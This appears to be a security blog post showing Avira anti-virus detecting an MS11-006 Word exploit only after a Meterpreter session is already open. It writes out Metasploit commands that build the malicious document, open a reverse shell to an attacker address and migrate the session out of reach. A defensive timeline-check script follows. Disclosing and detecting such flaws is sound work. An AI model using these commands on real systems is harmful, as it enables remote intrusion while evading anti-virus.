Metasploit Meterpreter race condition against Avira anti-virus
This video demonstrates a race condition against Avira anti-virus products. The race condition is due to design errors in the Avira anti-virus products themselves.
We will exploit the MS11-006 vulnerability (Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow) and use a reverse TCP meterpreter payload.
As you will see, the installed “Avira AntiVir Personal” anti-virus detects the attack, but too late: the meterpreter session is already created and you have access to the system.
The demonstrated product is an up-to-date “Avira AntiVir Personal”, but this race condition also appears in other Avira products, such as “Avira AntiVir Premium” and “Avira Premium Security Suite”.
Metasploit commands:
To create the msf.doc file that exploits the MS11-006 vulnerability
use exploit/windows/fileformat/ms11_006_createsizeddibsection
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
To listen for incoming meterpreter sessions
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
set InitialAutoRunScript migrate -f
exploit -j
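From the defender's side, the race described above shows up as an ordering problem in endpoint telemetry: the outbound connection from the document viewer and the migration into another process both precede the anti-virus alert, so terminating the original process no longer ends the session. The following added example (not from the original post, and not the output of any Avira or Metasploit component) runs a small timeline check over constructed events; the event kinds, process names and timestamps are assumptions made for the example.

```python
"""Timeline check for the 'detected too late' race.

Added example, not from the original post. Event format, field names and the
sample timeline are constructed for illustration, not taken from any product.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, Optional


@dataclass
class Event:
    ts: datetime
    kind: str    # "process", "network", "remote_thread" or "av_alert" (assumed kinds)
    image: str   # process that produced the event
    detail: str


# Processes from which an outbound connection is unexpected (assumed list).
OFFICE_IMAGES = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE"}

# Constructed sample timeline: the document is opened, the payload connects
# back, Meterpreter migrates into another process, and only then does the
# anti-virus alert fire against the original process.
T0 = datetime(2011, 3, 1, 12, 0, 0)
SAMPLE_EVENTS = [
    Event(T0, "process", "WINWORD.EXE", "opened msf.doc"),
    Event(T0 + timedelta(seconds=2), "network", "WINWORD.EXE", "outbound 192.168.178.21:4444"),
    Event(T0 + timedelta(seconds=3), "remote_thread", "WINWORD.EXE", "thread created in explorer.exe"),
    Event(T0 + timedelta(seconds=5), "av_alert", "WINWORD.EXE", "shellcode detected, process terminated"),
]

# Constructed counter-example: the alert lands before the migration completes.
BLOCKED_EVENTS = [
    Event(T0, "process", "WINWORD.EXE", "opened msf.doc"),
    Event(T0 + timedelta(seconds=2), "network", "WINWORD.EXE", "outbound 192.168.178.21:4444"),
    Event(T0 + timedelta(seconds=2.5), "av_alert", "WINWORD.EXE", "shellcode detected, process terminated"),
    Event(T0 + timedelta(seconds=3), "remote_thread", "WINWORD.EXE", "thread created in explorer.exe"),
]


def find_office_beacon(events: List[Event]) -> Optional[Event]:
    """First outbound connection made by an Office process, or None."""
    for e in sorted(events, key=lambda e: e.ts):
        if e.kind == "network" and e.image.upper() in OFFICE_IMAGES:
            return e
    return None


def find_migration(events: List[Event], beacon: Event) -> Optional[Event]:
    """First remote-thread creation by the beaconing process after the beacon."""
    for e in sorted(events, key=lambda e: e.ts):
        if e.kind == "remote_thread" and e.image == beacon.image and e.ts >= beacon.ts:
            return e
    return None


def analyze(events: List[Event]) -> dict:
    """Summarise the ordering of beacon, migration and anti-virus alert.

    av_lag_seconds > 0 means the alert came after the session was already up;
    session_survives is True when migration finished before the alert, so that
    killing the original process does not end the session.
    """
    ordered = sorted(events, key=lambda e: e.ts)
    result = {"beacon": False, "migrated": False,
              "av_lag_seconds": None, "session_survives": False}
    beacon = find_office_beacon(ordered)
    if beacon is None:
        return result
    result["beacon"] = True
    migration = find_migration(ordered, beacon)
    result["migrated"] = migration is not None
    alert = next((e for e in ordered
                  if e.kind == "av_alert" and e.image == beacon.image), None)
    if alert is None:
        # No alert at all: the session is untouched.
        result["session_survives"] = True
        return result
    result["av_lag_seconds"] = (alert.ts - beacon.ts).total_seconds()
    if migration is not None and migration.ts < alert.ts:
        result["session_survives"] = True
    return result


if __name__ == "__main__":
    for name, evs in (("race", SAMPLE_EVENTS), ("blocked", BLOCKED_EVENTS)):
        print(name, analyze(evs))
```

The check to take away is the last one: an alert that fires against the original process is only useful if it precedes the remote-thread event, which is why the post's `InitialAutoRunScript migrate -f` setting matters to the outcome. Alerting on an Office process making an outbound connection or creating a thread in another process, independently of the signature alert, does not depend on winning that race.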
Demonstration video:
I recommend reading these related posts:
- Metasploit Meterpreter race condition against Emsisoft Anti-Malware
- Metasploit Exploitation Scenarios – Scenario 3 Astaro Security Gateway & Dr.Web Antivirus
- Sophos Anti-Virus Sophail PDF Vulnerability Metasploit Payload Demo
- 10 of 10 malwares detected by Mac Sophos Anti-Virus are false positives. Does yours?
- Clamav antivirus blocking Yahoo, Apple HTML.IFrame-39
- CVE-2010-3867 : ProFTPD IAC Remote Root Exploit
- EDB-ID-16940 : Microsoft .NET Runtime Optimization Service Privilege Escalation
- CVE-2011-2595 ACDSee FotoSlate PLP File id Parameter Overflow Metasploit Demo
- Cisco Smart Business Architecture (SBA) guides for SIEM solutions integration
- CVE-2008-0610 UltraVNC 1.0.2 Client Buffer Overflow Metasploit Demo